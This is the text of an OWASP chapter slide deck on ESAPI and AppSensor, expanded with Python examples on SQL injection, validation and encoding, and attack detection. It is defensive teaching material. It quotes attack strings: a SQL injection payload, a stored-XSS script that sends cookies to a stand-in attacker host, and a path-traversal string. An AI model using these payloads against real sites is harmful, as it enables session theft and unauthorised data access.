“The cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”


1 Protecting Web Applications with ESAPI and AppSensor
Manuel Lopez Arredondo, manuel.lopez@owasp.org

2 “The cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”

3 Why is security important?
Ponemon Institute (2012). Cost of Cyber Crime Study. Ponemon Institute LLC.

4 Why is security important?
Verizon (2012). Data Breach Investigations Report. Verizon.

5 Why is security important?

6 What is OWASP: Mission Driven
Nonprofit | World Wide | Unbiased
OWASP does not endorse or recommend commercial products or services

7 What is OWASP: Community Driven
30,000 mailing list participants
200 active chapters in 70 countries
1,600+ members, 56 corporate supporters, 69 academic supporters

8 OWASP Guadalajara Chapter
What do we have to offer?
Community of security professionals
Monthly meetings
Mailing list
Presentations
Workshops
Open forums for discussion
Vendor-neutral environment
March 2012 to date: [chart: meetings, workshops, conference, newsletter, page visits; figures shown: 3, 1, 2,528+]

9 What is OWASP: Quality Resources
200+ projects
15,000+ downloads of tools and documentation
250,000+ unique visitors, 800,000+ page views (monthly)

10 Quality Resources
[chart: project mix by type (Code, Tools, Documentation); figures shown: 40%, 10%, 50%]

11 OWASP Top Ten (2010 Edition)
A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
A6: Security Misconfiguration
A7: Failure to Restrict URL Access
A8: Insecure Cryptographic Storage
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards

12 A1 – Injection
Injection means tricking an application into including unintended commands in the data sent to an interpreter.
Interpreters take strings and interpret them as commands: SQL, OS shell, LDAP, XPath, Hibernate (HQL), etc.
SQL injection is still quite common. Many applications are still susceptible (really don't know why), even though it is usually very simple to avoid.
Typical impact: usually severe. The entire database can usually be read or modified. It may also allow full database schema or account access, or even OS-level access.

13 SQL Injection – Illustrated
Form fields: Account, SKU (the attacker enters ' OR 1=1-- in the Account field)
Resulting SQL query: "SELECT * FROM accounts WHERE acct='' OR 1=1--'"
1. Application presents a form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards the attack to the database in a SQL query
4. Database runs the query containing the attack and sends encrypted results back to the application
5. Application decrypts the data as normal and sends the results to the user (HTTP response: an account summary listing every account)
[diagram: the HTTP request crosses the network layer (firewall) into the application layer (hardened OS, web server, app server, custom code) and reaches the databases, legacy systems, web services and directories behind the application's business functions]
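The query above, run for real. This is an added example, not code from the slides or from ESAPI: the accounts table and its rows are constructed sample data in an in-memory SQLite database, and the only input is the payload the slide's attacker types into the Account field. The vulnerable lookup splices the form value into the SQL text exactly as step 3 describes, so the `--` comments out the closing quote and `OR 1=1` matches every row; the parameterised lookup binds the same value as data and returns nothing.

```python
"""Added example (not from the slides): the deck's `' OR 1=1--` payload run
against a constructed SQLite table, first through the vulnerable
string-concatenated query from slide 13, then through a parameterised query."""
import sqlite3
from typing import List, Tuple

# Constructed sample data standing in for the "accounts" table on the slide.
SAMPLE_ACCOUNTS: List[Tuple[str, str, float]] = [
    ("A100", "alice", 120.50),
    ("A200", "bob", 990.00),
    ("A300", "carol", 15.25),
]

# The form value the slide's attacker submits in the "Account" field.
INJECTION_PAYLOAD = "' OR 1=1--"


def make_db() -> sqlite3.Connection:
    """In-memory database with the sample accounts loaded."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (acct TEXT PRIMARY KEY, owner TEXT, balance REAL)"
    )
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", SAMPLE_ACCOUNTS)
    return conn


def build_vulnerable_sql(acct: str) -> str:
    """Step 3 on the slide: the raw form value is spliced into the SQL text,
    so the interpreter sees attacker-controlled characters as SQL."""
    return "SELECT acct, owner, balance FROM accounts WHERE acct='" + acct + "'"


def lookup_vulnerable(conn: sqlite3.Connection, acct: str) -> list:
    """Executes whatever build_vulnerable_sql produced."""
    return conn.execute(build_vulnerable_sql(acct)).fetchall()


def lookup_safe(conn: sqlite3.Connection, acct: str) -> list:
    """The value is bound as a parameter: it is compared as data and can
    never change the structure of the statement."""
    return conn.execute(
        "SELECT acct, owner, balance FROM accounts WHERE acct=?", (acct,)
    ).fetchall()


def demo() -> dict:
    """Runs both lookups with the slide's payload and returns what each saw."""
    conn = make_db()
    return {
        "sql_sent_to_db": build_vulnerable_sql(INJECTION_PAYLOAD),
        "vulnerable_rows": lookup_vulnerable(conn, INJECTION_PAYLOAD),
        "safe_rows": lookup_safe(conn, INJECTION_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The string the vulnerable path hands to SQLite is character for character the query on the slide. Parameterisation is the fix; whitelist validation of the account number (the ESAPI approach shown later in the deck) is worth adding on top, but it is not a substitute for binding.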

14 A2 – Cross-Site Scripting (XSS)
Occurs any time raw data from an attacker is sent to an innocent user's browser.
Raw data can be stored in the database, reflected from web input (form field, hidden field, URL, etc.), or sent directly into a rich JavaScript client.
Virtually every web application has this problem. Try this in your browser: javascript:alert(document.cookie)
Typical impact: steal the user's session, steal sensitive data, rewrite the web page, redirect the user to a phishing or malware site.
Most severe: install an XSS proxy that allows the attacker to observe and direct all of the user's behaviour on the vulnerable site and force the user to other sites.

15 Cross-Site Scripting Illustrated
1. Attacker sets the trap ("update my profile"): the attacker enters a malicious script into a web page that stores the data on the server (application with a stored XSS vulnerability in its custom code)
2. Victim views the page and sees the attacker's profile: the script runs inside the victim's browser with full access to the DOM and cookies
3. Script silently sends the attacker the victim's session cookie

16 Enterprise Security API
Project Leader: Chris Schmidt
Purpose: a free, open source, web application security control library that makes it easier for programmers to write lower-risk applications.
Reboot

17 ESAPI – Vision
Build a common set of security controls for today's most popular programming languages.
Have interfaces in common across programming languages as much as is possible and natural.
Provide at least a simple reference implementation for each security control, to serve as an example if not useful in itself.
Easily extensible.
Provide functionality that is most often needed but lacking (or inconsistent) in various frameworks and languages.

18 Using ESAPI (1 of 3): Getting started
Download:
ESAPI Cheat Sheet:
ESAPI Swingset:

19 Using ESAPI (2 of 3): Getting help
ESAPI User mailing list (focuses on the Java version): https://lists.owasp.org/mailman/listinfo/esapi-user
ESAPI Developer mailing list:
ESAPI Project page: (coming soon)

20 Using ESAPI (3 of 3): Getting involved
Many other language implementations, all playing catch-up
ESAPI for Java needs help with user documentation
ESAPI 2.1 (Java) starting soon
ESAPI Swingset and Swingset Interactive: port to use ESAPI 2.0

21 Enterprise Security API
[architecture: Custom Enterprise Web Application, built on the Enterprise Security API, which sits in front of Existing Enterprise Security Services/Libraries]
ESAPI components: Authenticator, User, AccessController, AccessReferenceMap, Validator, Encoder, HTTPUtilities, Encryptor, EncryptedProperties, Randomizer, Exception Handling, Logger, IntrusionDetector, SecurityConfiguration

22 Potential Enterprise ESAPI Cost Savings

23 Basic ESAPI Approach – Examples
In Java:
String input = request.getParameter("input");
// Throws ValidationException or IntrusionException if there is a problem
String cleaned = ESAPI.validator().getValidInput(
        "Secure input example", // context, used in log messages
        input,
        "SafeString",           // name of the validation regex (defined in ESAPI.properties)
        200,                    // max length
        false,                  // no nulls
        true);                  // canonicalize before validating
String safeHTML = ESAPI.encoder().encodeForHTML(cleaned);

24 Basic ESAPI Approach – Examples
In PHP:
$cleanTmp = array();    // local in scope
$cleanParams = array(); // local in scope
// $input holds the raw request parameter; getValidInput throws a
// ValidationException or IntrusionException if there is a problem
$cleanTmp['username'] = ESAPI::getValidator()->getValidInput(
    "Secure input example", $input, "SafeString", 200, false, true);
$cleanParams['username'] = ESAPI::getEncoder()->encodeForHTML($cleanTmp['username']);
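The validate-then-encode pattern of the two snippets above, and the stored-XSS flow of slide 15 it is meant to stop, worked through in plain Python. This is an added example, not ESAPI's own code: the `SafeString` regex, the 40-character limit and the attacker host in the payload are assumptions made for the illustration. Canonicalization is the part people skip, so the example makes it explicit: validation runs on the decoded form of the input, and input that was encoded twice or in mixed schemes is rejected outright instead of being decoded until something matches.

```python
"""Added example (not ESAPI's code): the validate-then-encode pattern from
slides 23-24 in plain Python, applied to the stored-XSS scenario of slide 15.
The "SafeString" pattern, the 40-character limit and the attacker host in the
payload are assumptions made for this illustration."""
import html
import re
import urllib.parse
from typing import Optional

# Whitelist regexes looked up by name, the way ESAPI keys them in ESAPI.properties.
# This SafeString is an assumed definition: letters, digits, spaces, a little
# punctuation, and the apostrophe/ampersand that occur in real names.
VALIDATION_PATTERNS = {
    "SafeString": re.compile(r"^[A-Za-z0-9 .,'&_-]*$"),
}

# Constructed stored-XSS payload an attacker might save as a "profile name".
XSS_PAYLOAD = "<script>document.location='http://attacker.invalid/?c='+document.cookie</script>"

PROFILE_TEMPLATE = '<div class="profile">Name: {name}</div>'


class ValidationException(Exception):
    """Raised when input fails validation or carries suspicious encoding."""


def canonicalize(value: str, strict: bool = True) -> str:
    """Undo URL and HTML-entity encoding so validation sees the simplest form:
    %3Cscript%3E and &lt;script&gt; must not slip past a regex that only
    looks for '<'. In strict mode, input encoded more than once or in mixed
    schemes is rejected: legitimate users do not double-encode."""
    decoders = (urllib.parse.unquote, html.unescape)
    current = value
    decode_rounds = 0
    while True:
        changed = False
        for decode in decoders:
            decoded = decode(current)
            if decoded != current:
                decode_rounds += 1
                current = decoded
                changed = True
        if not changed:
            return current
        if strict and decode_rounds > 1:
            raise ValidationException("multiple or mixed encoding detected")


def get_valid_input(context: str, value: Optional[str], pattern_name: str,
                    max_length: int, allow_null: bool,
                    do_canonicalize: bool = True) -> str:
    """Mirrors the getValidInput call on the slides: canonicalize, then enforce
    the length limit and the named whitelist regex, raising on any failure."""
    if value is None or value == "":
        if allow_null:
            return ""
        raise ValidationException(f"{context}: input is required")
    if do_canonicalize:
        value = canonicalize(value)
    if len(value) > max_length:
        raise ValidationException(f"{context}: longer than {max_length} characters")
    if not VALIDATION_PATTERNS[pattern_name].fullmatch(value):
        raise ValidationException(f"{context}: does not match {pattern_name}")
    return value


def encode_for_html(value: str) -> str:
    """Output encoding for an HTML text or quoted-attribute context. Applied
    even to validated data: validation and encoding defend different layers."""
    return html.escape(value, quote=True)


def render_profile_vulnerable(stored_name: str) -> str:
    """Slide 15 as drawn: whatever was stored is dropped straight into the page."""
    return PROFILE_TEMPLATE.format(name=stored_name)


def render_profile_safe(submitted_name: str) -> str:
    """Validate on the way in, encode on the way out."""
    clean = get_valid_input("profile name", submitted_name, "SafeString", 40, False)
    return PROFILE_TEMPLATE.format(name=encode_for_html(clean))


if __name__ == "__main__":
    print(render_profile_vulnerable(XSS_PAYLOAD))   # the script ships to every viewer
    print(render_profile_safe("O'Brien & Sons"))   # apostrophe and ampersand encoded
    try:
        render_profile_safe(XSS_PAYLOAD)
    except ValidationException as exc:
        print("rejected:", exc)
```

Note that the safe renderer still encodes a value that has already passed the whitelist: the whitelist keeps the stored data sane, the encoder makes the output context safe, and dropping either one leaves a gap the other was never designed to cover.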

25 OWASP ESAPI Project Scorecard: Feature Set vs. Programming Language
[table: one row per feature (Authentication, Identity, Access Control, Input Validation, Output Escaping, Canonicalization, Encryption, Random Numbers, Exception Handling, Logging, Intrusion Detection, Security Configuration, WAF), one column per language implementation; cell values shown include 2.0, 1.4, 2.0 planned, ???, TBD]

26 Source Code and Javadoc Online Now!

27 Create attack-aware applications: AppSensor
Project Leaders: Michael Coates, John Melton, Colin Watson
Purpose: defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application.
Release: AppSensor November 2010 (tool) and September 2008 (documentation)

30 Detecting Attacks the Right Way
Detect INSIDE the application
Automatic detection
Comprehensive
Minimize false positives
Understand business logic
Immediate response
No manual effort required


32 Implementing AppSensor
Detection points
Application log server
AppSensor brain
Response listener
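A toy version of the four components just listed, wired together. This is an added example, not the AppSensor project's code: the detection point IDs, labels, thresholds and the event stream are constructed for the illustration (the IDs are modelled loosely on AppSensor's catalogue, not copied from it). Detection points inside the application report events; the brain writes each one to the application log, counts events per user and detection point inside a time window, and hands a response to a listener when a threshold is crossed. A business-logic signal such as tampering with a direct object reference gets a threshold of one, which is the "understand business logic, immediate response" point from slide 30; a noisy signal such as a validation failure needs several hits before the application reacts, which keeps false positives down.

```python
"""Added example (not the AppSensor project's code): a toy version of the
pipeline on slide 32. Detection point IDs, thresholds and the event stream
are constructed for this illustration."""
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, List, Optional, Tuple


@dataclass(frozen=True)
class DetectionPoint:
    id: str
    label: str
    threshold: int   # events from one user within `window` that trigger the response
    window: float    # seconds; 0 means every event counts on its own
    response: str    # what the response listener should do


# Assumed configuration. A business-logic violation gets an immediate
# response; noisier signals get a threshold inside a time window.
DETECTION_POINTS: Dict[str, DetectionPoint] = {
    "IE1": DetectionPoint("IE1", "input validation failure", 3, 60.0, "logout"),
    "AE2": DetectionPoint("AE2", "repeated failed passwords", 5, 300.0, "lock_account"),
    "ACE1": DetectionPoint("ACE1", "direct object reference tampering", 1, 0.0, "lock_account"),
}


@dataclass(frozen=True)
class Event:
    ts: float      # seconds since an arbitrary epoch
    user: str
    dp_id: str
    detail: str


class AppSensorBrain:
    """Correlates detection-point events per (user, detection point)."""

    def __init__(self, points: Dict[str, DetectionPoint]) -> None:
        self.points = points
        self.history: Dict[Tuple[str, str], Deque[float]] = defaultdict(deque)
        self.log: List[str] = []   # the slide's application log, one line per event

    def report(self, event: Event) -> Optional[str]:
        dp = self.points[event.dp_id]
        self.log.append(f"t={event.ts:.0f} user={event.user} dp={dp.id} ({dp.label}) {event.detail}")
        recent = self.history[(event.user, dp.id)]
        recent.append(event.ts)
        while recent and event.ts - recent[0] > dp.window:   # age out old events
            recent.popleft()
        if len(recent) >= dp.threshold:
            recent.clear()          # start a fresh count after responding
            return dp.response
        return None


class ResponseListener:
    """Applies the brain's decisions to application state."""

    def __init__(self) -> None:
        self.locked: set = set()
        self.logged_out: set = set()
        self.actions: List[Tuple[str, str, str]] = []

    def handle(self, user: str, dp_id: str, response: str) -> None:
        if response == "logout":
            self.logged_out.add(user)
        elif response == "lock_account":
            self.locked.add(user)
        self.actions.append((user, dp_id, response))


# Constructed event stream in time order. Alice's failure at t=0 ages out of
# the 60-second window, so only the three at t=100, 130 and 150 trigger the logout.
SAMPLE_EVENTS: List[Event] = [
    Event(0, "alice", "IE1", "<script> in profile name"),
    Event(100, "alice", "IE1", "' OR 1=1-- in account field"),
    Event(120, "bob", "AE2", "bad password"),
    Event(121, "bob", "AE2", "bad password"),
    Event(122, "bob", "AE2", "bad password"),
    Event(123, "bob", "AE2", "bad password"),
    Event(124, "bob", "AE2", "bad password"),
    Event(130, "alice", "IE1", "../../etc/passwd in filename"),
    Event(150, "alice", "IE1", "double-encoded %253Cscript%253E in search"),
    Event(200, "carol", "ACE1", "acct changed from A200 to A300 in GET"),
]


def run_events(events: List[Event]) -> ResponseListener:
    """Feeds every event through the brain and returns the listener's state."""
    brain = AppSensorBrain(DETECTION_POINTS)
    listener = ResponseListener()
    for event in events:
        response = brain.report(event)
        if response is not None:
            listener.handle(event.user, event.dp_id, response)
    return listener


if __name__ == "__main__":
    for user, dp_id, response in run_events(SAMPLE_EVENTS).actions:
        print(f"{user}: {dp_id} -> {response}")
```

The detection points here are the same checks the ESAPI validator already performs (a validation failure is an event, not just an exception), which is why the two projects pair naturally: the validator says "this input is bad", AppSensor decides what the application does about a user who keeps sending bad input.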


34 VIDEO DEMO

35 Takeaways
Open source solutions
Low cost and low effort
Think out of the box for development teams
Techniques used in the industry
OWASP Google Summer of Code 2013

36 Q & A

37 Backup

38 About OWASP
Online since December 1st, 2001
Not-for-profit charitable organization
OPEN: everything at OWASP is radically transparent, from our finances to our code.
INNOVATION: OWASP encourages and supports innovation and experiments for solutions to software security challenges.
GLOBAL: anyone around the world is encouraged to participate in the OWASP community.
INTEGRITY: OWASP is an honest and truthful, vendor-agnostic, global community.

39 OWASP Success Story


41 Application Developers
New attack and defense guidelines
Cheat Sheets
WebGoat: a deliberately insecure web application designed to teach web application security lessons

42 Application Testers and Quality Assurance
Testing Guide
Penetration testing tools
Application Security Verification Standard project

43 OWASP ZAP Proxy / WebScarab / CSRF Tester

44 OWASP Testing Framework
4. Web Application Penetration Testing
4.2 Information Gathering
4.3 Configuration Management Testing
4.4 Business Logic Testing
4.5 Authentication Testing
4.6 Authorization Testing
4.7 Session Management Testing
4.8 Data Validation Testing
4.9 Testing for Denial of Service
4.10 Web Services Testing
4.11 Ajax Testing
(OWASP Testing Guide v3; v4 is not finalized)

45 Application Project Management and Staff
Define the process (SDLC)
Code review
Code review tool
Decision maker

46 Get OWASP Books (download)

47 Business advantages of being associated with OWASP
The main benefit of becoming an OWASP corporate supporter is to demonstrate the organization's belief that application security is important and that the organization is taking the necessary steps to properly address application security risk in its business.
The organization itself gets security benefits at reduced cost: security code review tools are free; lots of open and free security testing tools; security guidelines and best practices.
Opportunity to display the organization's logo at OWASP events and conferences and on the website.
The organization gets listed as a sponsor in the newsletter that goes to over 20,000 individuals around the world on the OWASP mailing lists and LinkedIn group.
If you are looking to expand your business in an emerging market, here is an opportunity to reach out.
When an organization becomes a supporter of a security community, it helps employees, partners, suppliers and customers understand the value and importance of security, and improves application security throughout the whole supply chain.
Membership options:

48 Join Us! Subscribe to the mailing list
Chapter Leaders: Eduardo Cerna, Manuel Lopez

49 AppSensor Design
[diagram components: Demo App with embedded AppSensor, App Logs, AppSensor "Brain", Response]

